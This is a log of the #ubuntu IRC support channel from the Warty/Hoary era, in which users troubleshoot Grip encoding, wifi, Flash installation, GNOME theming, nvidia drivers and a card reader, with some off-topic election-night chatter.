Matt|[Phaedrus] , go to the website01:51
[Phaedrus] I already did HrdwrBoB, its going to take another few weeks01:52
CraigoryI noticed the mail applet is missing in hoary right now.  Does anybody know what Ubuntu's evil plan is?  Or just a bug? (:01:52
HrdwrBoBCraigory: the evil plan is to put cool new stuff into haory01:52
kapputuhi all01:52
WWHrdwrBoB: I have to go.  I'll add some notes to the bug report.  Thanks for your help!01:52
[Phaedrus] hi kapputu01:52
thoreauputicSe7h: I thought  an ls -l on that path might be informative01:52
kapputu[Phaedrus] , you want me to send one ?01:53
CraigoryHr: do you have the inside scoop?  I've always thought the email applet could suck less.01:53
[Phaedrus] if its not too much trouble for you kapputu. You'll have to send it to India though01:53
kapputuIndia ?/01:53
kapputuwhy ?01:54
[Phaedrus] yeah, I'm in india at the moment01:54
kapputuwhere in India ?01:54
[Phaedrus] south01:54
kapputuwhich city ?01:54
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CraigoryPhaedrus... A Greek character of some sort, no?  Seems he was mentioned in "Zen and the Art of Motorcycle Maintenance".01:55
[Phaedrus] yes Craigory01:55
[Phaedrus] that's the one01:55
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SmokingFireadmins: please correct this: Please don't paste in he channel, use http://www.pastebin.com/  (he should be the)01:56
stodgeAny way to remove Evolution without removing ubuntu-desktop? Or is ubuntu-desktop just GNOME?01:56
SmokingFirestodge: right click on the ubuntu-desktop package and see dependecies01:57
HrdwrBoBSmokingFire: the beauty of ubuntu is you can fix it yourself :)01:57
SmokingFireHrdwrBoB: I have rights to change the topic?01:57
stodgeTHere aren't many - just not sure what will happen01:57
SmokingFireHrdwrBoB: ooh, didn't know but I'm not comfortable doing so.01:58
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levstodge: ubuntu-desktop should just be a meta-package -- don't worry about removing it.01:58
levstodge: that is, removing it won't remove other stuff you want to have01:59
GotD0they all... does anybody know a way i can set up my dualhead system so that each monitor has a different resolution?01:59
=== ..[topic/#ubuntu:HrdwrBoB] : http://www.ubuntulinux.org/support/documentation/faq/ || Wiki: http://wiki.ubuntu.com/ || Lists: http://lists.ubuntu.com/ || Bugs: http://bugzilla.ubuntu.com/ || warty is out, no X.org, please wait || Please don't paste in the channel, use http://www.pastebin.com/ || CDs will ship in a few weeks
HrdwrBoBSmokingFire: there we go, thanks :)01:59
SmokingFireHrdwrBoB: thanks01:59
stodgeI'm seeing if I can remove Gnome without trashing my installation - have KDE installed :)01:59
HrdwrBoBGotD0t: yes, have a look at http://bob.is.teh.admin.at.vicnet.net.au/XF86Config-402:00
GotD0tthanks hrdwrbob02:00
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HrdwrBoBstodge: why do you want KDE over gnome?02:01
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GotD0tits sexier...02:01
Se7hLinuxJones no good02:01
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HrdwrBoBit's sexier?02:01
GotD0ti dunno02:01
=== HrdwrBoB blinks
AgentSmithkde sexier than gnome? eww02:01
Se7hthe problem seems to be on glibc02:01
AgentSmithkde is float ware02:01
Se7hbut...cant find the reason02:02
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skullcan someone help me on a wifi problem ?02:02
GotD0tthe one that the suse 9.2 livedvd has is sexier than the default in ubuntu02:02
levskull: what's the problem?02:02
GotD0tthat is*02:02
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kapputuGotD0t, what do you mean by sexier ? Didn't you see Ubuntu's artwork ? :-P02:02
thoreauputicstodge: why would you remove gnome to have kde anyway? Why not have both?02:02
skullI can't connect to my network in wifi02:02
levskull: what are the steps you're using?02:02
skullI have a intel card02:02
Matt|can anyone help me with that grip problem???02:03
skulldriver ipw210002:03
Matt|ok Problem: i have grip installed. I just installed lame (after grip) and now i get an error when trying to encode using lame (invalid executable); how can i fix this???02:03
skullI configure it02:03
skullI can see my acces point, I have a good signal (100%)02:03
thoreauputicMatt|: have you looked at the permissions on the lame executable?02:03
skullbut I can't get an IP02:03
Matt|thoreauputic, ah no i haven't02:03
levskull: what access point are you using?02:04
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thoreauputicMatt|: worth a look and maybe chmod can fix it02:04
skullit is a router02:04
Matt|thoreauputic, -rwxr-xr-x02:04
HrdwrBoBMatt|: can you run lame from the command line02:04
Matt|it worked on my last ubuntu install02:04
Matt|HrdwrBoB, yes02:06
thoreauputicMatt|: OK that isn't it, obviously02:06
HrdwrBoBMatt|: also in the grip config, what does it say the lame executable is02:06
Matt|-h -b %b %w %m02:06
levskull: have you tried sudo dhclient?02:06
levskull: that requests an ip from the DHCP server on your network...do you also have a wired connection?02:07
skullI dont have ip for eth102:07
skullI use the wire to be there :)02:07
Matt|mebbe you can't have both?02:07
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skullwhen i do ifconfig i have a sit0 which appear02:08
Matt|thoreauputic, HrdwrBoB, any more ideas for fixing grip?02:08
levskull: specify your wireless device (eth1?) with dhclient: eg sudo dhclient eth102:09
skullMatt|, i tried to active just one but it is the same02:09
HrdwrBoBis there any more to the error?02:09
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Matt|HrdwrBoB, i'll try and open it in a terminal02:09
Matt|"invalid encoder executable. Please check your encoder config"02:09
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skullit seams he cant find one02:10
skullNo DHCPOFFERS received.02:10
levskull: i gotta go -- sorry to leave you mid way.02:10
skullit s ok02:11
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thoreauputicMatt|: wild stab in the dark -  dpkg-reconfigure lame02:12
Matt|thoreauputic, tried it :(02:12
Matt|any more ideas anyone?02:12
thoreauputicMatt|: :(02:12
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HrdwrBoBMatt|: the encoder executable is /usr/bin/lame02:15
HrdwrBoBnot lame02:15
HrdwrBoBthat is the default02:15
HrdwrBoBtry that02:15
Matt|ok will try it02:15
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Matt|HrdwrBoB, thats done the trick (!?!?!)02:15
Matt|thanks a lot02:15
Matt|what is a good permission number for my home directory? 772?02:16
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HrdwrBoBMatt|: excellent02:17
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Matt|HrdwrBoB, the grip fix or the permission number?02:17
HrdwrBoBthe grip fix02:17
Matt|yup thanks for that02:17
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Bartman00hi guys02:17
Matt|HrdwrBoB, how about the permission :p?02:17
HrdwrBoBdrwxrwsr-x <- home dir permissions02:18
Matt|recursive? would you be able to give me a number? (i prefer numbers)02:18
HrdwrBoBwhich are .. 277502:18
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Matt|ok i'll try it thanks02:18
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Bartman00I'm sort of a noob.. I got DRI working on my Nvidia card... but how do I get Flash and Shockwave installed?02:20
Bartman00macromedia says there's no shockwave install for Firefox02:20
Matt|Bartman00, you need to install the flash plugin02:20
Matt|in synaptic it is flash-nofree or something02:20
sysopHrdwrBoB: Are you sure you'd want write permissions for group on a home dir? Just curious?02:21
Bartman00and one guide I read about installing the flash plugin said a plugin installer window would come up but it didn't02:21
HrdwrBoBsysop: you are in your own group02:21
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HrdwrBoBsysop: I'm also simply regurgitating the default permissions02:21
sysopHrdwrBoB: ok...just curious. Thanks!02:21
HrdwrBoBno worries :)02:22
Bartman00crap... the flash installer is asking for a valid path to the browser.. what's the path to firefox?02:24
Bartman00why can't the synaptic package manager install this02:24
Bartman00is there a way to apt-get upgrade the default install of firefox to RC1?02:25
Matt|Bartman00, you can install flash directly from synaptic02:26
subterrificthere were crashing bugs in 1.0RC1 so they reverted to an older version for warty02:26
Matt|it is called flashplugin-nonfree02:26
Bartman00I did a search for "flash" and it came up with nothing02:27
shaverthere were crash bugs in 1.0PR02:27
shaverwarty predates RC102:27
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Matt|subterrific is correct02:27
subterrificactually i'm not so sure, when did the PR come out?02:28
Matt|subterrific, it is included in the warty cd packages02:28
Matt|so before that ;)02:28
Matt|Bartman00, you may need some different repositories02:28
Bartman00Matt|, ok.. I must be stupid.. I'm in synaptic.. and I looked at "All" and there is no flashplugin-nofree listed02:28
Matt|Bartman00, ok you need to activate maybe the universe repository02:29
shaverwe released PR1 on 15 sep02:29
Bartman00how.. I"m noob to this distro.. I'm only mildly stupid with Sude..02:29
shaverer, 1.0PR02:29
shaverRC1 was 27 oct02:29
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Matt|Bartman00 ok just edit /etc/apt/sources.list and uncomment the lines with "universe"02:30
Bartman00ok.. I can handle that02:30
Bartman00why are they off by default?02:30
Matt|because they have been judged to have issues02:30
Matt|for example proprietary packages02:30
Matt|hence the "nonfree"02:31
Bartman00I like this distro so far.. but they should make it easy for someone like me to install flash..02:31
=== bintrue hates samba
Bartman00OMG they include pico02:31
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Matt|Bartman00, feel ya, but it is beyond their abilities i think02:32
Matt|they are not able to include those packages02:32
Bartman00I know.. Flash can not be included with a distro.. shame02:32
usualoooo gnome 2.9 packages in hoary02:32
Bartman00there's really no reason I can see02:32
Matt|oh kewl02:33
bradit _is_ easy to install flash02:33
subterrificthats the firefox bug02:33
Bartman00ok.. removed the # can I just launch the updater again and it will us the uni?02:33
Matt|brad, not exactly02:33
Matt|Bartman00, hopefully02:33
Bartman00ya.. not exactly02:33
thoreauputicBartman00: actually you can add repositories in synaptic, i believe02:33
Bartman00if you have to edit a text file.. it's not exactly "window user" level02:33
Matt|Bartman00, thoreauputic is right02:34
thoreauputicBartman00: ^^^^02:34
Matt|you still have to know that you should add a repo to install flash02:34
Bartman00I removed the # from both uni.. still no flash.. but I did get an error on one of the uni links02:34
Matt|Bartman00, update02:35
Matt|i.e. click on "reload" in synaptic02:35
Bartman00new to me02:35
Bartman00look!! flash love02:35
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Matt|oh good02:35
Bartman00any other sites I should add for uber package love?02:36
FoxfyreHey guys, anyone have experience getting a laptop to display battery power in ubuntu?02:36
Matt|Foxfyre, yes02:36
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subterrificoh weird, i reported that bug, but the My Bugs search in bugzilla doesn't show it for me02:36
FoxfyreMatt, care to help me out?02:36
Bartman00this distro is friendly, I'm liking02:37
Matt|Foxfyre, https://bugzilla.ubuntu.com/show_bug.cgi?id=2711 is mine02:37
Matt|i have to sleep now tho02:37
Matt|nite nite02:37
LinuxJonesBartman00, so is the irc channel :)02:37
Bartman00true.. it's strange to be asking noob questions in an IRC channel and actually have someone answer!!!02:38
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FoxfyreAnyone else have experience with acpi on laptops?02:39
Bartman00I'm actually going to be giving this computer to a totally "computer stupid" person. I gave her an old P2 with win 2k on it to play around with.02:39
LinuxJonesBartman00, like the old saying goes, there are no stupid questions just stupid answers02:39
Bartman00I wasn't sure she'd eve use a computer. She started using it a lot and killed it with spyware soon after.. so insted of trying to fortify windows I figured a linux distro would do nicely02:40
robertj_Ubuntu is a rather dull distro to use02:40
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Bartman00I know.. .I do IT support at a library in Ohio.. I have to work in the computer lab a couple days a week.. I hear it all.. I like helping people who want to try.. I like seeing them learn new stuff and supprise me02:41
LinuxJonesrobertj_, what do you mean dull ?02:41
robertj_Most complaiints are "X is missing" and the general response is "We know, X is coming in Hoary"02:41
robertj_Other than that, there isn't alot of action going on02:41
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psyklopsAs opposed to "we have 500 bugs! oh noez!"?02:42
phlaegelrobertj_: sounds like you want gentoo. ;-)02:42
robertj_No, I'm quite fine thank you ;)02:42
LinuxJonesrobertj_, X.org is not the be-all end-all of a distro :)02:42
siimomy router is heating up.......... :O02:42
robertj_Linux: i'm waiting for my Security Update applet02:42
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robertj_other than that, I'm really not looking forward to anything Ubuntu wise02:43
robertj_Well except for the security updates02:43
phlaegelsince ubuntu is supposed to just work, it shouldn't be exciting to use...02:43
robertj_It's not, it's really nice to be dull02:43
Bartman00hey thanks alot guys.. got it working and I'm going to give it to her... well now..02:43
LinuxJonesrobertj_, that is what a cron job is for. The end-user shouldn't even see that :)02:43
Bartman00I think I'm going to be back.. I'll have to try this on my own computer02:43
Bartman00thanks again02:43
psyklopsbartman, does this person live nearby?02:44
Bartman00ya.. in the basement02:44
psyklopsokay good...02:44
Bartman00it's a huge house02:44
psyklopsthey'll probably have complaints for a week or so02:44
Bartman00oh ya.. I wouldn't give it to a remote user.. my god the phone calls..02:44
psyklopsstuff like "how do I look at flash sites?"02:44
Bartman00no.. they'll be ok.. really.. the only 2 apps she uses there's allready short cuts for.. firefox and email02:44
Bartman00I got flash installed02:45
Bartman00and she knows fire fox.. I had it on her 2k computer02:45
Bartman00I'll be around... thanks02:45
siimowhen next release of ubuntu comes can i dist-upgrade to it without losing settings?02:45
psyklopssiimo: that's hopefully how it will work :)02:45
robertj_I'm curious what he new package installation tool is going to be02:46
psyklopsno one plans on bugs02:46
robertj_psyklops: then why is there a security source in the sources.list ;)02:46
psyklopsfor when stuff doesn't go as planned02:46
lifelesspsyklops: speak for yourself.02:46
lifelessbugs are great for testing regression testing frameworks.02:46
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siimomy current dist is working perfectly but im thinking of switching to ubuntu for wider package base02:47
LinuxJonessiimo, there is a live cd you can check out before you actually do an install02:49
siimoyeah im downloading it now02:49
LinuxJonessiimo, Hope everying works for you with it. Ubuntu is very nice :)02:50
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=== sysop has searched many distros for many moons and Ubuntu has satisfied unlike any other distro! ;-)
FoxfyreSo, does anyone have experience fiddling with the acpi? Mine does not seem to be running, or rather, receving any info for my battery status.02:52
wm_eddiesysop: join the cul^H^Hlub :p02:52
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LinuxJonessysop, my sentiments exactly :)02:53
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siimowell i currently run arch and its pretty stable02:54
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siimoopps wrong button02:57
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billytwowillyhi, the install didn't make a root user or atleast didn't give me the chance to set a password for one. How do I do that?03:00
Astharotis there any person from ubuntu team ?03:01
chibifsMore than likely.03:01
chibifsIt is a community effort :P03:01
chibifsYou can sneak your way on :o03:01
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billytwowillynevermind, I figured it out03:02
AstharotI'd like to talk with someone involved into ubuntu project...03:03
robertj_Astharot: why?03:05
chibifsI'm involved! I almost wrote on the wiki :o03:05
sysopLike chibifs said, its a community thing, but you could try http://www.canonical.com/ their Ubuntu's more formal support.03:05
Astharoti wanted to know how to join a team03:05
Astharotfor? to join a team :)03:06
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robertj_what sort of team?03:06
Astharotsecurity team03:06
chibifsI want to do official XFCE pacakges. :P03:06
chibifsI've been helping out with XFCE 4.2 for months. It's been fun. :o03:07
robertj_Astarot: doing what?03:08
chibifsThough Ben's Debian packages work completely fine with ubuntu. >.>'03:08
LinuxJonesrobertj_, do you work for Canonical ?03:08
robertj_Linux: no03:08
mbp__Astharot: i suggest you just start doing useful things03:08
Astharotrobertj_: dunno... patches for example :)03:08
mbp__send patches for bugs, etc03:08
mbp__help on the list and irc03:08
mbp__recognition will come from that03:08
LinuxJonesrobertj_, why are you asking him questions about it ?03:08
Astharotthere isn't a list about security ... just security-announce03:08
robertj_Because I might be able to direct him somewhere useful03:09
Astharoteheh thanks robertj_ :)03:09
brettcarAstharot: the -users lists would be fine for security issues03:09
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robertj_If someone comes to my office and says "I need to talk with Bryan (which is amusing because they frequently don't recognize that I am Bryan's boss)," I say "Why do you want him?"03:10
robertj_Why would anyonew ant to help out with security?03:11
LinuxJonesrobertj_, what does that have to do with his question ?03:11
sysopAstharot: No leader yet! Maybe your their man!?? http://www.ubuntulinux.org/community/teams/security/03:11
robertj_Linux: just curious03:11
chibifsTo improve upon things :o03:11
Astharotsysop: I read that03:11
robertj_Maybe ha's planning a large install?03:11
Astharotbut there are just 2 lines03:11
robertj_And this is IRC, on topic is not a requirement!03:12
robertj_but there is a Wiki page for prospective team members03:12
robertj_you might add yourself to it with your vitals03:12
LinuxJonesrobertj_, well considering your not affiliated with Canonical maybe you shouldn't jump to conclusions about people's intentions.03:12
robertj_Linux: i'm no03:13
ficusplanetOn the Hoary Goals page of the wiki there is an entry called "SVG-aware eye candy" that is assigned to Shuttleworth.  What exactly does this entry mean?03:14
LinuxJonesrobertj_, people might want to help with security to help the Linux comminity in general :)03:14
robertj_Linux: so?03:15
sysoprobertj_: so their unselfish and give to others03:16
LinuxJonesrobertj_, let's just drop it @ this point03:16
sysopand this makes them happy! :-)03:16
thoreauputicrobertj_: attitude, dude... take it easy03:16
billytwowillyso how do I change the window decorations in gnome? in kde it's easy. there's a program to do it.03:16
billytwowillyI want the window decorations setup like OSX with everything on the left03:17
ficusplanetbillytwowilly, Computer>>Sys Config>>Theme03:17
robertj_I still really don't see what you guys are up in arms about, clarifying questions are'nt an attack, assaault, or insult03:17
ficusplanetbillytwowilly, Oh, to change order of the buttons you do need gconf.03:17
=== billytwowilly is a long time kde user who is trying ubuntu because he likes the idea of it
chibifsgconf is gnome's version of the windows registry.03:18
ficusplanetbillytwowilly, gconf is the configuration framework of GNOME.03:18
stodgeWhat package are the X development files in?03:18
LinuxJonesrobertj_, you asked the question >> <robertj_> Why would anyonew ant to help out with security?03:18
billytwowillyI have to edit code to change the window decorations? that's kinda lame..03:18
robertj_I'm curious03:18
chibifsThe window decorations are changed in the theme prefrences.03:18
sysoprobertj_: so we answered03:18
ficusplanetIt IS NOT like the registry.  It is a collection of XML files.  However, you can use a regedit like program to change advanced options.  You don't need gconf-editor to change windecs.  You need it to change the button order, though.03:19
robertj_sysop: I don't really by unselfishness as an answer03:19
spivLinuxJones, robertj_, sysop: dissecting that conversation isn't going to go anywhere productive.  Just forget about it :)03:19
spivIt doesn't matter.03:19
LinuxJonesspiv, as I said earlier, Let's leave it @ that03:19
sysopspiv/Linux: true, thx!03:20
chibifsBah- It's the same concept as the registry, ficus. An excuse to be lazy about confugurations by putting the tweaky stuff in a seperate database program that gives you destructive abilities :P03:20
thoreauputicrobertj_: quote: <robertj_> sysop: I don't really by unselfishness as an answer That's really sad. I hope you recover from your cynicism03:20
LinuxJonesspiv, well I tried, I guess I am a sucker for the trolls :D03:21
chibifsIt has it's technical diffrences, but it's fairly similar in concept.03:21
robertj_thoreauputic: I'm not a cyncial person, so back off and let it go03:21
ficusplanetchibifs, Destructive abilities?  It is not a database at all.  It is a collection of XML files that can be accessed with a consistent API.  That is far different than the binary win registry.03:21
chibifsYes, technical diffrences. seperate xml files, single monolithic file-- It's just a diffrent orginization of things. :P03:22
thoreauputicrobertj_: Sure - I'm glad to drop it :) And I'm glad to hear you're not cynical :)03:22
robertj_chibi: although Windows does have a consistent API for registry access03:23
ficusplanetchibifs, A very important distinction, though.  Also, there is nothing preventing people - some already have - from creating more advanced tweaking utilities.03:23
billytwowillyficusplanet, is there just an osx theme for gnome 2.8? that might be easier. Is there a place like kde-look.org for gnome?03:23
LinuxJonesspiv, :D03:23
robertj_speaking of OS X, is there a dock-style applet?03:25
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chibifsYes, robertj_03:25
ficusplanetrobertj_, install gdesklets03:25
chibifsThere's a gdesklet app for it.03:25
ficusplanetand the starterbar desklet03:25
ficusplanetThey should be in universe03:25
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chibifshttp://www.customize.org/details/35220 <- Panther logon :D03:26
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Astharotthanks for info, bye bye03:28
robertj_chibi: once you get that going, how do you start the starterbar?03:29
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robertj_I ran the menu item, so I assume the daemon is running03:29
chibifsOpen nautilus03:29
chibifs.desktop files start up the desklet03:30
chibifsjust a sec. x_X03:30
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chibifsI think the package installs them to /usr/share/gdesklets/03:31
chibifsThen the displays03:32
billytwowillyhmm. no themes that put the close, maximize, minimize buttons on the left hand side. weird.03:32
Pizbitbillytwowilly: Grab some from art.gnome or gnome-look03:32
PizbitThere's bound to be a few03:33
chibifsart.gnome.org has a lot of window borders.03:33
jpsif /dev/input/event1 (that means my touchpad) does not change when i click a particular button (but the other 3 create changes), what does that mean?03:33
ficusplanetbillytwowilly, You have to use gconf-editor to change the button order.03:33
billytwowillyhey! a kde-look alike site!;)03:33
billytwowillyficusplanet, ok, sorry, I'm new to gnome, so I just run gconf-editor and it will become apparent what to do for me?03:34
bashhi all03:34
ficusplanetGo to apps>>metacity>>general03:34
ficusplanetchange button_layout from "menu:minimize,maximize,close" to "close, maximize, minimize:menu"03:34
ficusplanet*no spaces in the second entry, sorry03:35
chibifsGot it robert?03:36
billytwowillyhmm. no close button..03:36
robertj_chibifs: I found a starterbar.display03:37
robertj_is that what I need?03:37
chibifsYeah, just double click it, and drop it out on the desktop.03:38
billytwowillyficusplanet, thanks03:38
billytwowillyIt worked.03:38
robertj_complains about an error launching the application03:38
=== billytwowilly will have to play around with gconf-editor more
billytwowillyIs there a way to save a setup and revert if I screw something up royally?03:39
robertj_like its not associated iwth gdesklets03:39
Pizbitbillytwowilly: cp -a .gconf .gconf-backup ?:)03:39
billytwowillyheh. fair enough;)03:39
Pizbitrobertj_: Right click and open with and type in gdesklets03:39
ficusplanetbillytwowilly, If you delete a folder form .gconf, it will be replaced with the system defaults again.03:39
robertj_any way to get those swallowed?03:40
billytwowillynifty. thanks for the heads up03:40
=== tylerwylie [~tyler@tylerwylie.user] has joined #ubuntu
chibifsswallowed into what? :P03:41
tylerwylieso where would i go if i wanted to start developing packages for the ubuntu repository, it's awfully slim03:42
ficusplanettylerwylie, Uncomment universe.  There are over 14000 packages in ubuntu.03:42
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robertj_chobifs: the panel?03:42
tylerwylieumm? uncomment universe?03:43
ficusplanettylerwylie, Are you familiar with Synaptic?03:43
chibifsThey're desklets, you put them anywhere on the desk. :P03:43
tylerwyliei'm a gentoo-ite03:43
ficusplanettylerwylie, Go to Computer>>Sys Config>>Synaptic03:43
tylerwylieyea i know that03:43
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ficusplanetClick on Settings>>Repositories and uncheck the lines that have the word universe in the sections03:44
tylerwyliei know it's a front-end to apt-get, i prefer the command line03:44
ficusplanettylerwylie, In that case, edit /etc/apt/sources.list so that the lines containing universe are not commented.03:44
ficusplanetThen run apt-get update03:44
robertj_Urgh, that is an aweful immitation of the Dock ;)03:45
tylerwylieany other gentoo-ites in here?03:45
thoreauputictylerwylie: recovering gentooites ? *grin*03:46
ficusplanetrobertj_, gDesklets is essentially just a collection of eye candy toys.03:46
tylerwylieportage is just too good, and that's bad03:46
robertj_yeah, this one is'nt even pretty ;)03:46
=== Ruffian|JANE| [~jane@dhcp024-209-106-036.woh.rr.com] has joined #ubuntu
ficusplanetrobertj_, pixelated icons?03:46
robertj_no, drawing errors, aweful functionality, etc03:47
Ruffian|JANE|IS there a place where i can download a .png icon of the Ubuntu symbol.  or is it already on my systeM?03:47
ficusplanetRuffian|JANE|, /usr/share/ubuntu-artwork03:47
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PizbitRuffian|JANE|: There's several on the wiki too I believe03:47
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SoNiCfReAkmythtv gives me a sqlserver error03:48
robertj_ok, it's killed & removed ;)03:48
Ruffian|JANE|ficusplanet, there is the logo, i just want the symbol03:48
SoNiCfReAkis there anyway I can force it to run with using mysql server03:48
ficusplanetRuffian|JANE|, Just cut the symbol out with The GIMP.03:48
HrdwrBoBSoNiCfReAk: mythtv NEEDS mysql.03:49
nomasteryodaficusplanet: but for doing high-quality art you need the original03:49
chibifsHeh. I have an svg of it laying around somewhere.03:49
SoNiCfReAkwell I think I set up mysql server wrong03:49
SoNiCfReAkI didn't give it a name03:50
ficusplanetnomasteryoda, You mean a high-resolution version?03:50
ficusplanetCutting a PNG and resaving doesn't degrade quality.03:50
HrdwrBoBthat's the svg03:50
=== Pizbit told ya it was on the wiki!
nomasteryodai forgot they were svg03:51
nomasteryodai usually do at higher resolution03:51
nomasteryodalike 120003:51
nomasteryodathen scale back for distribution03:52
GotD0ti have an hp photosmart 7260 with a built in mem card reader, and i would like to be able to access my compact flash cards... anybody know how i could accomplish this?03:52
ficusplanetI asked this earlier, but what exactly is the "SVG-aware eye candy" that is assigned to Mark Shuttleworth for Hoary?03:52
HrdwrBoBGotD0t: if your printer has a usb hub and the card reader is an indepant device, it may work already03:53
HrdwrBoBficusplanet: SVG is scalable vector graphics03:53
GotD0thrdwrbob no... its a card reader built into the printer03:53
HrdwrBoBGotD0t: nono, logically I mean03:53
ficusplanetHrdwrBoB, I know.  I'm wondering what exactly they are referring to, though.  Human icon theme?03:53
ficusplanetAnd why Shuttleworth.03:53
HrdwrBoBficusplanet: I daresay it's something he's working on or getting commisioned for Haory03:54
GotD0thrdwrbob: oh... well it doesnt mount03:54
HrdwrBoBGotD0t: check dmesg for the messages when you plug it in03:54
HrdwrBoBif you want me to look, past it in #flood03:54
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nathanieldelaneyis there a flash player .deb package?03:55
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ficusplanetnathanieldelaney, Add the multiverse repository to your apt configuration.03:56
brettcarnathanieldelaney: http://www.ubuntu.com/wiki/RestrictedFormats03:56
GotD0thrdwrbob: doesnt see it03:56
tylerwyliehmm this is wierd not su'in lol03:57
tylerwyliei have no clue how to work about this03:57
tylerwylieif i was to run apt-get upgrade what would i run on command line03:58
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ficusplanetsudo apt-get upgrade03:59
ficusplanetThen enter your user's password03:59
tylerwyliedidn't work03:59
tylerwyliehad synaptic running03:59
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SuperQElection night: prelude to a recount04:04
SuperQcommedy central rules04:04
xipI forgot all about comedy central.  Time to turn off CNN04:05
LinuxJonesSuperQ, looks like Bush is getting back in ? ( I know nothing about US electoral process)04:05
ficusplanetLinuxJones, Way too early to tell.04:05
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LinuxJonesficusplanet, snn has it 176-112 for Bush04:06
SuperQLinuxJones: oh.. just enjoying commedy central04:06
LinuxJoneserr CNN04:06
ficusplanetKerry has the tree key West Coast states coming in.  The swing states are still open.04:06
SuperQfeh.. CNN04:06
SuperQcommedy central04:06
ficusplanetIt doesn't matter what the electoral count is at this point.04:06
LinuxJonesElector a count = wins more states= wins Presidency ?04:08
xipIts a little closer to win more states with larger population = win more electoral votes = win presidency04:08
tritiumLinuxJones, no, each state has a different number of electoral votes based on population.  It's not just winning a majority of the states.04:09
=== patator [~skullbock@MTL-HSE-ppp206488.qc.sympatico.ca] has joined #ubuntu
ficusplanetLinuxJones, We need to see Ohio, Florida, Pennsylvania, etc. to know who will win.  Most states haven't been called for either candidate yet, including a lot of big electoral counts that will go for Kerry - i.e. California04:09
billytwowillyd/j #xchat04:10
LinuxJonesI am not an even an American but I hope that Kerry wins :D04:10
=== billytwowilly hopes bush wins
xipLinuxJones: I like to hear that :)04:10
nomasteryodaLinuxJones...you in the UK?04:11
=== billytwowilly thinks it will hasten the end of America;
usualbush is an idiot04:11
usualkerry isn't a good choice04:11
tsengOT stuff elsewhere please04:11
billytwowillyKerry has worse economic policies though04:11
usualwe are fucked either way04:11
nomasteryodaer, canada04:11
usualtseng, roger04:11
billytwowillyI installed the maxcos-x aqua theme and it changed the color of my text in xchat to white04:11
LinuxJonesnomasteryoda, sadly I am much closer to Bush, Canada :)04:11
billytwowillywith a white input box background04:11
billytwowillyhow do I change it back?04:11
usualchange your theme04:12
billytwowillybut the theme is awesome except for the xchat problem04:12
usualso who will be the first guy with an ubuntu tattoo04:12
usualedit it04:12
usuali dunno04:12
usualask the author04:12
nomasteryodaLinuxJones: yea, i looked at your hostname04:12
xipI might be if I can get my nvidia graphics drivers to work04:13
usualxip, whats wrong04:13
ficusplanetRuffian|JANE|, Too close to tell so far.  Lets stay on topic.04:13
xipNothing a little research wont fix.  It appears I just need to get some kernel headers or something04:13
usualxip, yes install the kernel headers04:14
usualxip, then the drivers will build04:14
xipusual, can I use apt to get them?04:14
usualxip, install the meta package linux-686 or linux-38604:15
LinuxJonesnomasteryoda, heh04:15
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usualxip, if your using intel i think04:15
usualxip, not sure if amd has other packages04:15
xipusual, I'm still using the vanilla ubuntu kernel on an AMD Tbird04:16
usualxip, if you dpkg -l|grep linux04:16
usualyou will see all the packages you have installed for the kernel04:16
GotD0ti have an hp photosmart 7260 with a built in mem card reader, and i would like to be able to access my compact flash cards... anybody know how i could accomplish this?04:16
balubaGotD0t, it's a usb-storage camera?04:17
GotD0tbaluba: no... it doesnt have a USB port04:18
GotD0tbaluba: its an ancient digi cam04:18
tylerwylieubuntu's suprisingly good,04:18
balubaGotD0t, what kind of connection it has?04:18
tylerwyliecompared to gentoo it might be worthy of dual bootage04:18
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GotD0tbaluba: it doesnt... i have to stick my memory card into my printer's CF reader to get it in windows... but ubuntu doesnt recognize my printers CF slot04:19
xipusual, okay trying to apt-get install linux-386 tells me I already have the newest version.  But I still can't install the nvidia drivers04:19
LinuxJonestylerwylie, no, you have it wrong. Gentoo might be worthy of Dual Booty :)04:20
tylerwylieLinuxJones, :P04:20
tylerwylieLinuxJones, if ubuntu let you compile your own kernel upon bootup it'd be that way04:21
LinuxJonestylerwylie, how many folks need that ?04:21
tritiumdoesn't ubuntu have kernel-package?04:22
Micksateehee, dual booty04:22
billytwowillywhere would I find  xchat in gconf-editor?04:23
usualbuilding a package for the new gimp04:23
tylerwylieLinuxJones, i do04:25
=== Burgundavia [~Burgundav@S01060050ba84f285.gv.shawcable.net] has joined #ubuntu
LinuxJonestylerwylie, try the LiveCD and see if it supports all your system. You have exotic hardware ?04:27
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KentutMerahwhere can i view a list of all ubuntu's packages ?04:28
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tylerwylieLinuxJones, i'm running ubuntu right now i scrapped gentoo for a week to see how i do04:29
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LinuxJonesRuffian|JANE|, ??04:30
Ruffian|JANE|LinuxJones, Bush is winning04:30
tsengOT elsewhere, thanks04:30
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tritiumRuffian|JANE|, stop it04:30
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GotD0tok people... dont laugh, but i have an old CF card reader that goes through the printer port. does anybody know how i can get ubuntu to recognize it04:32
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tolstoyKentutMerah, do you mean that are installed on your machine?04:32
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tolstoyKentutMerah, otherwise, try archive.ubuntu.org04:32
KentutMerahtolstoy, thanks .. i was talking about on the site :)04:32
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xipusual, that worked perfectly.  Thanks again :)04:32
usualxip, np04:33
tolstoyKentutMerah, I think the archive site lets you browse the actual repository.04:33
nomasteryodadoes Ubuntu auto-recognize a newly installed TV tuner?04:33
tolstoyOtherwise, some version of apt-cache / dpkg, etc, will list 'em.04:33
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usualor synaptic04:33
GotD0ti have an old CF card reader that goes through the printer port. does anybody know how i can get ubuntu to recognize it04:33
HrdwrBoBGotD0t: past the dmesg output from when you plug it in in #flood04:34
KentutMerahquestion : i see a lot of zope products are those for zope-2.6.x or 2.7.x ?04:34
HrdwrBoBor even better, lsusb04:34
usualcool i unlocked my nokia phone04:34
nomasteryodawhat does dmesg show04:34
nomasteryodaHrdwrBoB: yea04:35
usualyour boot messages04:35
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nomasteryodausual: nice04:35
GotD0thrdwrbob: i can see it detects it at address 5404:35
HrdwrBoBGotD0t: lsusb output and the logs!04:35
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JaraminI had problems with the 4.10 release of Ubuntu for PPC, couldn't get pas the reboot, something to do with a bug in initrd-tools. So I chrooted into it, upgraded to Hoary. Upon reboot, all is fine, but I just have the CLI. Is there a package that has Gnome and all the stuff to get the usual graphical desktop?04:36
spivJaramin: ubuntu-desktop04:37
Jaraminspiv: mucho thanks04:37
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tylerwylieare there any other african linux distros? :P04:38
GotD0thrdwrbob: posted04:39
Burgundaviatylerwylie: yes, there is one called impi04:40
tylerwyliei like this brown04:40
tylerwylieit's not ugly brown04:40
Burgundaviatylerwylie: http://www.impi.org.za/04:40
tylerwylieit's sedated brown04:40
nomasteryodayea ...04:40
nomasteryodabut another theme for the terminal should be added by default04:41
